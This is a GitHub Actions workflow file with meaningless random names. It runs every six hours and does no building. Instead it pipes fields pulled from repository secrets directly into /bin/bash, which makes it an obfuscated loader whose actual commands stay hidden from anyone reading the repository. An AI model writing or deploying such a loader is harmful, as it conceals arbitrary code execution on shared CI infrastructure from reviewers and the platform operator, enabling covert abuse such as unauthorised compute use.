name: bowallow

on:
  workflow_dispatch:
  schedule:
    - cron: '54 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: bowallow
        env:
          epz92585: ${{ secrets.epz92585 }}
        run: |
          echo $epz92585 | jq -r .tlwuw2277 | /bin/bash
          echo $f05154 | jq -r .cleta7 | /bin/bash
          echo $k6 | jq -r .h6 | /bin/bash
          echo $iabz36706 | jq -r .lkc80793 | /bin/bash
          echo $zeiae04779 | jq -r .psun9 | /bin/bash
          echo $jdzxc8903 | jq -r .n1162 | /bin/bash
          echo $ya48 | jq -r .fda7 | /bin/bash
          echo $jqfdh63873 | jq -r .n79 | /bin/bash
          echo $jgx53821 | jq -r .s447 | /bin/bash
          echo $ydga86 | jq -r .eabgx5028 | /bin/bash
          echo $qzilh0 | jq -r .mddop761 | /bin/bash
          echo $tkcqm85 | jq -r .vig8 | /bin/bash

